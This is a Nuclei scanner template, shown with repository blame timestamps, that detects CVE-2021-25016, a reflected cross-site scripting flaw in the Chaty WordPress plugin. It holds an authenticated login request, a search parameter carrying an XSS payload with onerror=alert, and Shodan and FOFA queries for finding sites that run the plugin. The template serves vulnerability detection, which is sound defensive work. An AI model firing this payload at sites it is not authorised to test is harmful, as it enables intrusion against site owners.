nuclei-templates/http/cves/2021/CVE-2021-25016.yaml

61 lines
2.1 KiB
YAML
Raw Normal View History

2023-10-16 18:37:06 +00:00
id: CVE-2021-25016
info:
2023-10-17 08:16:05 +00:00
name: Chaty < 2.8.2 - Cross-Site Scripting
author: luisfelipe146
2023-10-16 18:37:06 +00:00
severity: medium
description: |
2023-10-17 08:16:05 +00:00
The Chaty WordPress plugin before 2.8.3 and Chaty Pro WordPress plugin before 2.8.2 do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting.
remediation: Fixed in 2.8.3
2023-10-16 18:37:06 +00:00
reference:
- https://wpscan.com/vulnerability/b5035987-6227-4fc6-bc45-1e8016e5c4c0
2023-10-17 08:16:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25016
2023-10-16 18:37:06 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25016
2023-10-17 08:16:05 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25016
2023-10-17 08:16:05 +00:00
cwe-id: CWE-79
epss-score: 0.00106
epss-percentile: 0.43227
cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:*
2023-10-16 18:37:06 +00:00
metadata:
verified: true
max-request: 2
vendor: premio
product: chaty
framework: wordpress
2024-05-31 19:23:20 +00:00
shodan-query: http.html:/wp-content/plugins/chaty/
fofa-query: body=/wp-content/plugins/chaty/
publicwww-query: "/wp-content/plugins/chaty/"
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio
2023-10-16 18:37:06 +00:00
http:
2023-10-17 08:16:05 +00:00
- raw:
2023-10-16 18:37:06 +00:00
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
2023-10-17 08:16:05 +00:00
GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1
2023-10-16 18:37:06 +00:00
Host: {{Hostname}}
2023-10-17 08:16:05 +00:00
matchers-condition: and
2023-10-16 18:37:06 +00:00
matchers:
2023-10-17 08:16:05 +00:00
- type: word
part: body
words:
- "search=</script><img src onerror=alert(document.domain)>"
- "chaty_page_chaty"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100c82f86dcd3e8b4a15e3ddea6f2679ac006399a334f94d29004e7c499a456647c02207d7a1d690acd371e2575c5a5890894ee0a0e3ca1c7507d8e83c613349a67ec41:922c64590222798bb761d5b6d8e72950